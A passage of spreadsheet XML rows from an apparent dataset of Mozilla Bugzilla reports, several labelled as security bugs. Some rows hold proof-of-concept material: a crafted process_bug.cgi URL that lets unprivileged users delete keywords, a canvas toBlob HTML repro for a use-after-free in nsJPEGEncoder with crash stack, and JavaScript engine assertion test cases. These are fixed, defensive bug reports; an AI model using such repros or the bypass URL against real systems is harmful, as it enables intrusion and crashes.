        <v>1</v>
      </c>
    </row>
    <row r="3240">
      <c r="A3240" t="n">
        <v>252638</v>
      </c>
      <c r="B3240" t="inlineStr">
        <is>
          <t>2004-07-22 10:00:31 -0700</t>
        </is>
      </c>
      <c r="C3240" t="inlineStr">
        <is>
          <t>Form param hacking allows unprivileged users to remove bug's keywords</t>
        </is>
      </c>
      <c r="D3240" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:40 -0800</t>
        </is>
      </c>
      <c r="E3240" t="n">
        <v>1</v>
      </c>
      <c r="F3240" t="n">
        <v>1</v>
      </c>
      <c r="G3240" t="n">
        <v>4</v>
      </c>
      <c r="H3240" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3240" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3240" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K3240" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3240" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3240" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3240" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3240" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3240" t="inlineStr">
        <is>
          <t>[fixed in 2.16.7] [fixed in 2.18rc3] [fixed in 2.19.1]</t>
        </is>
      </c>
      <c r="Q3240" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3240" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3240" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T3240" t="n">
        <v>1</v>
      </c>
      <c r="U3240" t="n">
        <v>0</v>
      </c>
      <c r="V3240" t="n">
        <v>21</v>
      </c>
      <c r="W3240" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040615 Firefox/0.8
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040615 Firefox/0.8
By tweaking the form parameters to process_bug.cgi, it is possible for a user
with no permission bits (including reporter or assignee status) to remove the
keywords from a bug. process_bug.cgi diffs the current value of each field from
@::log_columns against the corresponding form parameter, and if the field is
being modified, determines if the user is allowed to change that field. 
This works in most cases but ignores the effect of the 'keywordaction' field,
which may instruct the script to delete the specified keywords. This field is
only displayed on the "change multiple bugs" form, which requires edit-bugs
privs, but the parameter is still accessible by all users. URLs such as the
following allow any logged in user to delete any bug's keywords: 
/process_bug.cgi?id_&lt;bug_id_to_change&gt;=on&amp;dontchange=--do_not_change--&amp;product=--do_not_change--&amp;keywords=&lt;bug's_current_keywords&gt;&amp;keywordaction=delete&amp;knob=none&amp;component=--do_not_change--&amp;version=&lt;bug's_current_version&gt;
Reproducible: Always
Steps to Reproduce:
1. Log in
2. Use above URL
Actual Results:  
Keywords were deleted
Expected Results:  
ThrowUserError("illegal_change",...</t>
        </is>
      </c>
      <c r="X3240" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3241">
      <c r="A3241" t="n">
        <v>350238</v>
      </c>
      <c r="B3241" t="inlineStr">
        <is>
          <t>2006-08-25 15:48:28 -0700</t>
        </is>
      </c>
      <c r="C3241" t="inlineStr">
        <is>
          <t>&lt;x/&gt;.@*++ causes "Assertion failure: JS_UPTRDIFF(fp-&gt;sp, fp-&gt;spbase) &lt;= depthdiff" at jsinterp.c:392</t>
        </is>
      </c>
      <c r="D3241" t="inlineStr">
        <is>
          <t>2006-11-10 11:27:15 -0800</t>
        </is>
      </c>
      <c r="E3241" t="n">
        <v>1</v>
      </c>
      <c r="F3241" t="n">
        <v>1</v>
      </c>
      <c r="G3241" t="n">
        <v>3</v>
      </c>
      <c r="H3241" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3241" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3241" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3241" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3241" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3241" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3241" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3241" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3241" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3241" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3241" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3241" t="inlineStr">
        <is>
          <t>mozilla1.8.1</t>
        </is>
      </c>
      <c r="T3241" t="n">
        <v>1</v>
      </c>
      <c r="U3241" t="n">
        <v>0</v>
      </c>
      <c r="V3241" t="n">
        <v>18</v>
      </c>
      <c r="W3241" t="inlineStr">
        <is>
          <t>Steps to reproduce:
  In a debug build,
  javascript:&lt;x/&gt;.@*++;
Result:
  Assertion failure: JS_UPTRDIFF(fp-&gt;sp, fp-&gt;spbase) &lt;= depthdiff,
  at jsinterp.c:392</t>
        </is>
      </c>
      <c r="X3241" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3242">
      <c r="A3242" t="n">
        <v>1217631</v>
      </c>
      <c r="B3242" t="inlineStr">
        <is>
          <t>2015-10-22 15:44:00 -0700</t>
        </is>
      </c>
      <c r="C3242" t="inlineStr">
        <is>
          <t>The DB schema changes in bug 1182464 were not made against the Heroku RDS instance</t>
        </is>
      </c>
      <c r="D3242" t="inlineStr">
        <is>
          <t>2015-10-23 03:24:00 -0700</t>
        </is>
      </c>
      <c r="E3242" t="n">
        <v>1</v>
      </c>
      <c r="F3242" t="n">
        <v>1</v>
      </c>
      <c r="G3242" t="n">
        <v>7</v>
      </c>
      <c r="H3242" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3242" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3242" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K3242" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3242" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3242" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3242" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3242" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3242" t="inlineStr"/>
      <c r="Q3242" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3242" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3242" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3242" t="n">
        <v>1</v>
      </c>
      <c r="U3242" t="n">
        <v>0</v>
      </c>
      <c r="V3242" t="n">
        <v>3</v>
      </c>
      <c r="W3242" t="inlineStr">
        <is>
          <t>In bug 1216153, this is causing:
django.db.utils.ProgrammingError: (1146, "Table 'treeherder.failure_match' doesn't exist")
Mauro, I'm presuming since we can't use migrations for the model, I'll need to manually run the SQL here:
https://github.com/mozilla/treeherder/blob/50172112e4ab8f3b77c81102b2a5aca7bbb5f018/treeherder/model/sql/template_schema/treeherder_reference_1.sql.tmpl#L642-L751
Is this correct?</t>
        </is>
      </c>
      <c r="X3242" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3243">
      <c r="A3243" t="n">
        <v>1205900</v>
      </c>
      <c r="B3243" t="inlineStr">
        <is>
          <t>2015-09-17 16:51:39 -0700</t>
        </is>
      </c>
      <c r="C3243" t="inlineStr">
        <is>
          <t>Heap Buffer Overflow in nsJPEGEncoder::ConvertHostARGBRow()</t>
        </is>
      </c>
      <c r="D3243" t="inlineStr">
        <is>
          <t>2024-05-30 09:05:36 -0700</t>
        </is>
      </c>
      <c r="E3243" t="n">
        <v>1</v>
      </c>
      <c r="F3243" t="n">
        <v>1</v>
      </c>
      <c r="G3243" t="n">
        <v>3</v>
      </c>
      <c r="H3243" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3243" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3243" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K3243" t="inlineStr">
        <is>
          <t>43 Branch</t>
        </is>
      </c>
      <c r="L3243" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3243" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3243" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3243" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3243" t="inlineStr">
        <is>
          <t>[adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q3243" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3243" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3243" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T3243" t="n">
        <v>1</v>
      </c>
      <c r="U3243" t="n">
        <v>0</v>
      </c>
      <c r="V3243" t="n">
        <v>36</v>
      </c>
      <c r="W3243" t="inlineStr">
        <is>
          <t>Created attachment 8662689
Uaf_ConvertHostARGBRow_Repro.html
Convert the canvas to blob in DOM attribute modified event can cause memory corruption.
Reproduce test case:
&lt;html&gt;&lt;body&gt;&lt;canvas id="canvas0"&gt;&lt;/canvas&gt;&lt;/body&gt;&lt;script&gt;
var canvas0=document.getElementById("canvas0");
var ctx=canvas0.getContext("2d");
canvas0.addEventListener("DOMAttrModified", function(event) {canvas0.toBlob(function(){},"image/jpeg", 1);}, true); 
canvas0.setAttribute("height",470)
setTimeout(function(){location.reload()},300);
&lt;/script&gt;&lt;/html&gt;
Steps to reproduce:
1. Open the attached test case (Uaf_ConvertHostARGBRow_Repro.html) in Firefox browser.
2. Firefox crashes at random address in nsJPEGEncoder::ConvertHostARGBRow()
First-chance exception at 0x104D34C8 (xul.dll) in firefox.exe: 0xC0000005: Access violation reading location 0x1A690002.
Unhandled exception at 0x104D34C8 (xul.dll) in firefox.exe: 0xC0000005: Access violation reading location 0x1A690002.
Firefox version: 43.0a1 (2015-09-09)
Call stack:
 	xul.dll!nsJPEGEncoder::ConvertHostARGBRow(const unsigned char * aSrc, unsigned char * aDest, unsigned int aPixelWidth) Line 364	C++
 	xul.dll!nsJPEGEncoder::InitFromData(const unsigned char * aData, unsigned int aLength, unsigned int aWidth, unsigned int aHeight, unsigned int aStride, unsigned int aInputFormat, const nsAString_internal &amp; aOutputOptions) Line 175	C++
 	xul.dll!mozilla::dom::ImageEncoder::GetInputStream(int aWidth, int aHeight, unsigned char * aImageBuffer, int aFormat, imgIEncoder * aEncoder, const wchar_t * aEncoderOptions, nsIInputStream * * aStream) Line 329	C++
 	xul.dll!mozilla::dom::ImageEncoder::ExtractDataInternal(const nsAString_internal &amp; aType, const nsAString_internal &amp; aOptions, unsigned char * aImageBuffer, int aFormat, const mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; aSize, mozilla::layers::Image * aImage, nsICanvasRenderingContextInternal * aContext, nsIInputStream * * aStream, imgIEncoder * aEncoder) Line 363	C++
&gt;	xul.dll!mozilla::dom::EncodingRunnable::ProcessImageData(unsigned __int64 * aImgSize, void * * aImgData) Line 169	C++
 	xul.dll!mozilla::dom::EncodingRunnable::Run() Line 202	C++
 	xul.dll!nsThread::ProcessNextEvent(bool aMayWait, bool * aResult) Line 874	C++
 	xul.dll!NS_ProcessNextEvent(nsIThread * aThread, bool aMayWait) Line 277	C++
 	xul.dll!mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate * aDelegate) Line 355	C++
 	xul.dll!MessageLoop::RunHandler() Line 228	C++
 	xul.dll!MessageLoop::Run() Line 202	C++
 	xul.dll!nsThread::ThreadFunc(void * aArg) Line 365	C++
 	nss3.dll!_PR_NativeRunThread(void * arg) Line 419	C
 	nss3.dll!pr_root(void * arg) Line 90	C
 	[External Code]	
 	[Frames below may be incorrect and/or missing, no symbols loaded for msvcr120.dll]	
Checking the variables of EncodingRunnable in debugger, the 0x5a5a5a5a pattern indicates an Use After Free:
-		mEncoder	{...}	nsCOMPtr&lt;imgIEncoder&gt;
+		nsCOMPtr_base	{mRawPtr=0x5a5a5a5a {...} }	nsCOMPtr_base
-		mImage	{mRawPtr=0x5a5a5a5a {mRefCnt={mValue={...} } mBackendData={mArray={mArr=0x5a5a5a62 {...} } } mImplData=...} }	nsRefPtr&lt;mozilla::layers::Image&gt;
+		mRawPtr	0x5a5a5a5a {mRefCnt={mValue={...} } mBackendData={mArray={mArr=0x5a5a5a62 {{...}, {...}, {...}, {...}, ...} } } ...}	mozilla::layers::Image *
-		stream	{...}	nsCOMPtr&lt;nsIInputStream&gt;
+		nsCOMPtr_base	{mRawPtr=0x00000000 &lt;NULL&gt; }	nsCOMPtr_base
-		this	0x194b4af6 {mType={mStorage=0x194b4b16 L"" } mOptions={mStorage=0x194b4baa L"婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚... } ...}	mozilla::dom::EncodingRunnable *
+		nsRunnable	{mRefCnt={mValue={...} } _mOwningThread={mThread=0x00000000 } }	nsRunnable
+		mType	{mStorage=0x194b4b16 L"" }	nsAutoString
+		mOptions	{mStorage=0x194b4baa L"婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚婚... }	nsAutoString
+		mImageBuffer	{mRawPtr=0x5a5a5a5a &lt;Error reading characters of string.&gt; }	nsAutoArrayPtr&lt;unsigned char&gt;
+		mImage	{mRawPtr=0x5a5a5a5a {mRefCnt={mValue={...} } mBackendData={mArray={mArr=0x5a5a5a62 {...} } } mImplData=...} }	nsRefPtr&lt;mozilla::layers::Image&gt;
+		mEncoder	{...}	nsCOMPtr&lt;imgIEncoder&gt;
+		mEncodingCompleteEvent	{mRawPtr=0x5a5a5a5a {mImgSize=??? mType={mStorage=0x5a5a5a86 &lt;Error reading characters of string.&gt; } ...} }	nsRefPtr&lt;mozilla::dom::EncodingCompleteEvent&gt;
		mFormat	1515870810	int
+		mSize	{...}	const mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;
		mUsingCustomOptions	true (90)	bool</t>
        </is>
      </c>
      <c r="X3243" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3244">
      <c r="A3244" t="n">
        <v>1361525</v>
      </c>
      <c r="B3244" t="inlineStr">
        <is>
          <t>2017-05-02 14:17:25 -0700</t>
        </is>
      </c>
      <c r="C3244" t="inlineStr">
        <is>
          <t>Register ping docType for Flash Shield study as "flash-shield-study"</t>
        </is>
      </c>
      <c r="D3244" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E3244" t="n">
        <v>1</v>
      </c>
      <c r="F3244" t="n">
        <v>1</v>
      </c>
      <c r="G3244" t="n">
        <v>2</v>
      </c>
      <c r="H3244" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3244" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J3244" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3244" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3244" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3244" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3244" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3244" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3244" t="inlineStr">
        <is>
          <t>[SvcOps]</t>
        </is>
      </c>
      <c r="Q3244" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3244" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3244" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3244" t="n">
        <v>1</v>
      </c>
      <c r="U3244" t="n">
        <v>0</v>
      </c>
      <c r="V3244" t="n">
        <v>3</v>
      </c>
      <c r="W3244" t="inlineStr">
        <is>
          <t>Created attachment 8863903
flash_shield_study-ping.json
On bug 1335232, we are releasing a Shield study with an add-on that will send us a custom ping named "flash-shield-study". In order to make it easier to query this data, so that it doesn't get aggregated with other pings, we want to partition this ping separately.
Is the schema necessary? The payload is a bit complex, so hopefully not.. In an any case, I've attached an example payload here, and the documentation for this payload is at https://github.com/squarewave/shield-study-essential-flash/blob/master/docs/metrics.md</t>
        </is>
      </c>
      <c r="X3244" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3245">
      <c r="A3245" t="n">
        <v>911707</v>
      </c>
      <c r="B3245" t="inlineStr">
        <is>
          <t>2013-09-02 02:37:58 -0700</t>
        </is>
      </c>
      <c r="C3245" t="inlineStr">
        <is>
          <t>Assertion failure: arr-&gt;lengthIsWritable() (setter shouldn't be called if property is non-writable), at jsarray.cpp</t>
        </is>
      </c>
      <c r="D3245" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:17 -0800</t>
        </is>
      </c>
      <c r="E3245" t="n">
        <v>1</v>
      </c>
      <c r="F3245" t="n">
        <v>1</v>
      </c>
      <c r="G3245" t="n">
        <v>3</v>
      </c>
      <c r="H3245" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3245" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3245" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3245" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3245" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3245" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3245" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3245" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3245" t="inlineStr">
        <is>
          <t>[jsbugmon:update,testComment=3,origRev=1179318fb5aa][adv-main27+]</t>
        </is>
      </c>
      <c r="Q3245" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3245" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3245" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T3245" t="n">
        <v>1</v>
      </c>
      <c r="U3245" t="n">
        <v>0</v>
      </c>
      <c r="V3245" t="n">
        <v>14</v>
      </c>
      <c r="W3245" t="inlineStr">
        <is>
          <t>Created attachment 798435
stack
try {
    x = [];
    y = [];
    f = (function() {
        y.length = 6
    });
    Object.freeze(y);
    f();
    Object.prototype.watch.call(x, "length", (function() {
        return function() {
            f()
        }
    })());
    Array.prototype.pop.call(x)
} catch (e) {}
Array.prototype.push.call(x, "")
asserts js debug threadsafe shell on m-c changeset 1179318fb5aa with --ion-eager --ion-inlining=off at Assertion failure: arr-&gt;lengthIsWritable() (setter shouldn't be called if property is non-writable), at jsarray.cpp
My configure flags are:
LD=ld CROSS_COMPILE=1 CXX="clang++ -Qunused-arguments -arch i386" RANLIB=ranlib CC="clang -Qunused-arguments -arch i386" AS=$CC AR=ar STRIP="strip -x -S" HOST_CC="clang -Qunused-arguments" HOST_CXX="clang++ -Qunused-arguments" sh ./configure --target=i386-apple-darwin9.2.0 --enable-macos-target=10.5 --enable-optimize --enable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --enable-methodjit --enable-type-inference --disable-tests --enable-threadsafe --with-ccache &lt;some NSPR compile flags, or use --with-system-nspr&gt;
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   http://hg.mozilla.org/mozilla-central/rev/c1ccfd8f31bf
user:        Eric Faust
date:        Fri Aug 30 18:50:36 2013 -0700
summary:     Bug 824393 - Part 0: Open SetPropertyIC to cases with uncertain TI. (r=bhackett)
(s-s because the stack is short and strange) Eric, is bug 824393 probably related?</t>
        </is>
      </c>
      <c r="X3245" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3246">
      <c r="A3246" t="n">
        <v>1158909</v>
      </c>
      <c r="B3246" t="inlineStr">
        <is>
          <t>2015-04-27 10:47:55 -0700</t>
        </is>
      </c>
      <c r="C3246" t="inlineStr">
        <is>
          <t>Build extraction tools for l10n</t>
        </is>
      </c>
      <c r="D3246" t="inlineStr">
        <is>
          <t>2015-06-11 10:40:28 -0700</t>
        </is>
      </c>
      <c r="E3246" t="n">
        <v>1</v>
      </c>
      <c r="F3246" t="n">
        <v>1</v>
      </c>
      <c r="G3246" t="n">
        <v>5</v>
      </c>
      <c r="H3246" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3246" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3246" t="inlineStr">
        <is>
          <t>BuddyUp</t>
        </is>
      </c>
      <c r="K3246" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3246" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3246" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3246" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3246" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3246" t="inlineStr">
        <is>
          <t>u=user c=buddyup p=3 s=2015.9</t>
        </is>
      </c>
      <c r="Q3246" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3246" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3246" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3246" t="n">
        <v>1</v>
      </c>
      <c r="U3246" t="n">
        <v>0</v>
      </c>
      <c r="V3246" t="n">
        <v>11</v>
      </c>
      <c r="W3246" t="inlineStr">
        <is>
          <t>This bug covers building tools to extract strings from BuddyUp, for use in the localization process outlined in bug 1128546 comment 2.
These tools need to 
1) Extract strings from JS code from gettext and ngettext callsites.
2) Be compatible with Nunjucks template files. This may take the form of extracting from pre-compiled templates, or parsing the original source directly.
3) Output a .po file compatible with Kitsune's localization process.
This took me a while when I did it in Yaocho. Hopefully some of that work will carry over, but I still think it wise to estimate this at 3 points.</t>
        </is>
      </c>
      <c r="X3246" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3247">
      <c r="A3247" t="n">
        <v>1074642</v>
      </c>
      <c r="B3247" t="inlineStr">
        <is>
          <t>2014-09-29 22:36:22 -0700</t>
        </is>
      </c>
      <c r="C3247" t="inlineStr">
        <is>
          <t>Firefox ignores Strict-Transport-Security when two more STS headers are sent from server</t>
        </is>
      </c>
      <c r="D3247" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:31 -0700</t>
        </is>
      </c>
      <c r="E3247" t="n">
        <v>1</v>
      </c>
      <c r="F3247" t="n">
        <v>1</v>
      </c>
      <c r="G3247" t="n">
        <v>3</v>
      </c>
      <c r="H3247" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3247" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3247" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3247" t="inlineStr">
        <is>
          <t>35 Branch</t>
        </is>
      </c>
      <c r="L3247" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3247" t="inlineStr">
        <is>
          <t>Windows 8</t>
        </is>
      </c>
      <c r="N3247" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3247" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3247" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main55+]</t>
        </is>
      </c>
      <c r="Q3247" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3247" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3247" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T3247" t="n">
        <v>1</v>
      </c>
      <c r="U3247" t="n">
        <v>1</v>
      </c>
      <c r="V3247" t="n">
        <v>22</v>
      </c>
      <c r="W3247" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Steps to reproduce:
1. Prepare a web server sending two more STS headers via valid https connection.
2. Access to the page from Firefox.
Actual results:
HSTS is not enabled.
Reproduction environment is here.
1) Launch following URL for receiving two STS headers.
https://alice.csrf.jp/hsts/
2) Launch following link, then HSTS is not enabled.
http://alice.csrf.jp/
Expected results:
Section 8.1 of HSTS spec (RFC 6797) requires following process to the UA.
If a UA receives more than one STS header field in an HTTP
response message over secure transport, then the UA MUST process
only the first such header field.
It seems that Firefox violates the mandatory spec RFC requires.
If one STS header is set by web app. and the other one is set by web server or some sort of network equipment, then, HSTS is not enabled on Firefox.</t>
        </is>
      </c>
      <c r="X3247" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3248">
      <c r="A3248" t="n">
        <v>1213248</v>
      </c>
      <c r="B3248" t="inlineStr">
        <is>
          <t>2015-10-09 04:46:37 -0700</t>
        </is>
      </c>
      <c r="C3248" t="inlineStr">
        <is>
          <t>Lack of notifications when marked as Mozilla contact for a priority Marketplace submission</t>
        </is>
      </c>
      <c r="D3248" t="inlineStr">
        <is>
          <t>2015-10-13 19:26:28 -0700</t>
        </is>
      </c>
      <c r="E3248" t="n">
        <v>1</v>
      </c>
      <c r="F3248" t="n">
        <v>1</v>
      </c>
      <c r="G3248" t="n">
        <v>6</v>
      </c>
      <c r="H3248" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3248" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J3248" t="inlineStr">
        <is>
          <t>Admin Tools</t>
        </is>
      </c>
      <c r="K3248" t="inlineStr">
        <is>
          <t>Avenir</t>
        </is>
      </c>
      <c r="L3248" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3248" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3248" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3248" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3248" t="inlineStr"/>
      <c r="Q3248" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3248" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3248" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3248" t="n">
        <v>1</v>
      </c>
      <c r="U3248" t="n">
        <v>0</v>
      </c>
      <c r="V3248" t="n">
        <v>3</v>
      </c>
      <c r="W3248" t="inlineStr">
        <is>
          <t>Lately I've not been getting any message notifications when I am marked as the Mozilla contact on a Marketplace submission. I used to get email updates for review feedback, messages and more.
The latest example is for the Abidjan.net submission;
https://marketplace.firefox.com/comm/app/514586
Steps to reproduce:
1. Go to a submission; https://marketplace.firefox.com/developers/app/abidjannet/edit
2. Under Admin Settings mark the app as 'Priority Review Needed' and enter your email address in the Mozilla Contact field. Save.
What should and has happened historically is that if there is any message, e.g review failure or anything between us and the developer contact — those messages are also emailed to the Mozilla contact email address.
Lately this is not  happening...</t>
        </is>
      </c>
      <c r="X3248" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3249">
      <c r="A3249" t="n">
        <v>1102977</v>
      </c>
      <c r="B3249" t="inlineStr">
        <is>
          <t>2014-11-21 09:00:44 -0800</t>
        </is>
      </c>
      <c r="C3249" t="inlineStr">
        <is>
          <t>Bulk validation page version drop downs are empty</t>
        </is>
      </c>
      <c r="D3249" t="inlineStr">
        <is>
          <t>2016-02-04 14:46:40 -0800</t>
        </is>
      </c>
      <c r="E3249" t="n">
        <v>1</v>
      </c>
      <c r="F3249" t="n">
        <v>1</v>
      </c>
      <c r="G3249" t="n">
        <v>6</v>
      </c>
      <c r="H3249" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3249" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J3249" t="inlineStr">
        <is>
          <t>Add-on Validation</t>
        </is>
      </c>
      <c r="K3249" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
